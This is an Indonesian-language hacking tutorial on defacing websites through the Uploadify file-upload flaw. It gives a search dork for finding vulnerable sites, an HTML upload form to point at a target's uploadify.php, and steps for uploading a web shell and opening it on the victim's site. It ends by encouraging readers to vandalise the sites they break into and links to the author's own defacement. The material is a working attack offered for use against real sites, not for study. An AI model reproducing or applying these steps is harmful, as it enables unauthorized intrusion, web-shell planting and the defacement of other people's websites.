Tutorial Deface Teknik Uploadify Vulnerability Upload Shell

Deface Dengan Cara Uploadify Vulnerability Upload Shell

Ini memang metode deface lama, tapi masih banyak kok yang pakai teknik ini :). Simak aja Tutorialnya

Bahan-Bahan :

1. PC/Laptop
2. Koneksi Internet
3. CSRF
4. Dork
5. Shell (kalo blm punya cari di gugel)

Dork : inurl:/uploadify/ intitle:index of    (bisa di kembangkan lagi)

CSRF : 

<form method="post" action="urltarget">
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Tusbol">
</form>

Atau CSRF online di http://mouncyler-community.hol.es/expl/ lalu kalian pilih Filedata

 

Tutorial :

1. Copy CSRF di atas lalu save dengan format .html 

2. Dorking

3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank)

4. Edit CSRF yg tadi dah di save, masukan url target ke bagian action="urltarget" lalu save lg (format tetap html)

5. Buka file CSRF tadi, pilih file yang mau kalian uoload (terserah mau shell/script)

6. Jika Vuln hasilnya akan ada nama/url file kalian. Contoh /shell.php

7. Nah untuk akses shell nya, silahkan kalian copy nama/url file kalian lalu taruh di belakang alamat web target. Contoh : www.site-target.co.li/shell.php

8. Silahkan kalian acak2 website nya, tapi jika web Indonesia mohon jangan di rusak, jika ingin tebas index, backup dlu index nya

Lihat hasil deface saya di sini : https://defacer.id/104636.html
Saya cuma bisa kasih liat mirror karna sekarang web nya sudah sembuh

Mohon maaf bila ada kekurangan/kesalahan, maklumi lah saya hanya newbie yang fakir ilmu
Source : Garuda security Hacker